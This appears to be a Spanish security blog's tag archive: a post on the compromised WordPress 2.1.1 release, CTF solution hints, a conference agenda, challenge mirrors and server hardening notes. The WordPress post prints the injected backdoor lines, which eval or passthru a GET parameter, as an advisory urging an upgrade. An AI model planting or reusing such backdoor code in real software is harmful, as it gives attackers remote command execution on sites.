Tag Archives: security

WordPress 2.1.1 Comprometido

Hace unos dias alguien ha entrado en la maquina de descargas de worpress y se han cambiado dos ficheros en wp-include en los cuales han metido codigo para ejecutar codigo por medio de parametro GET. Tal como dicen en la web de wordpress hay que actualizar inmeditamente a la version 2.1.2

El codigo injectado esta en estos dos ficheros:

  • wp-includes/feed.php
    84
    85
    86
    
    function comment_text_phpfilter($filterdata) {
        eval($filterdata);
    }
    149
    
    if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
  • wp-includes/theme.php
    408
    409
    410
    
    function get_theme_mcommand($mcds) {
      passthru($mcds);
    }
    441
    
    if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

hacker::quiz

Ya ha acabado la bkp 7ª edicion, y para quien le interese aqui os cuelgo aqui el codigo del hacker::quiz de este año. Realmente es muy sencillo, pero aun asi os colgare las soluciones.

Descargar hacker::quiz

Read more... (402 words, estimated 1:36 mins reading time)

  • Level1
  • Aparentemente no parece que hay ningun error de programacion, pero si pruebas de buscar los .bak, *~… encuentras el fichero login.php~ y en el aparece la contraseña en md5. Con un cracker de md5 como por ejemplo lcrack. En pocos minutos saldra la contraseña del nivel.
  • Level2
  • Aqui hay que fijarse que en el codigo hay un “src=javascript” y que el codigo bueno esta en el fichero javascript. Aqui se una un algoritmo de encriptacion super sencillo, que se puede desencriptar facilmente cambiando la funcion generatePass para sacar la contraseña.

Congreso No Con Name 2006

El proximo jueves 28 de Septiembre tendra lugar en el Parc Bit el congreso de seguridad informatica No Con Name 2006 que este año cuenta con ponentes traidores de fuera de España y con conferencias muy interesantes. Las conferencias que se daran seran las siguientes:

Read more... (188 words, estimated 45 secs reading time)

  • Andrés Tarascó ( Madrid – SIA ) – Exploiting win32 design flaws
  • Ramón Pinuaga ( Murcia – S21sec ) – Auditoría en DB2 ( un enfoque práctico )
  • Jesús Olmos González ( Barcelona – Internet Sec. Auditors ) – Seguridad de Código mediante tecnología vírica
  • Ero Carrera ( Germany- Sabre-Security ) – Reverse Engineering Malware. The Analyst’s View.
  • Raoul Chiesa ( Italy – Telecom Security Task Force ) – Having fun with X.25 hacking

Hack-it de la Euskal Encounter 2006

Se ha publicado el Hack-it de este año para quien quiera jugar desde casa. Yo ya me lo he bajado para trastear un poco ;o)

He creado un mirror en binware. Los mirrors que hay son:

  • Hack-it, mirror universidad: TAR.GZ
  • Hack-it, mirror blog.txipinet.com (lento): TAR.GZ
  • Hack-it, mirror binware: TAR.GZ

Tambien se han publicado las soluciones del nivel 1 al 17

  • Solucion Hack-it: 1-5
  • Solucion Hack-it: 6-10
  • Solucion Hack-it: 11-15
  • Solucion Hack-it: 16-17

Asegurando Server

Bueno, esta semana voy de dejar el servidor de hosting bien seguro. Ire poniendo todo lo que he ido haciendo. Por ahora tengo puesto unas cuantas cosas, pero como siempre la paranoia puede conmigo y no me parece suficientemente seguro ;P

Cosas instaladas:

Read more... (385 words, estimated 1:32 mins reading time)

  1. Portsentry
  2. Snort
  3. Firewall
  4. /tmp y /home montados con noexec,nosuid
    /dev/hda7       /tmp    ext3    defaults,noexec,nosuid                  0  2
    /dev/hda8       /home   ext3    defaults,noexec,nosuid                  0  2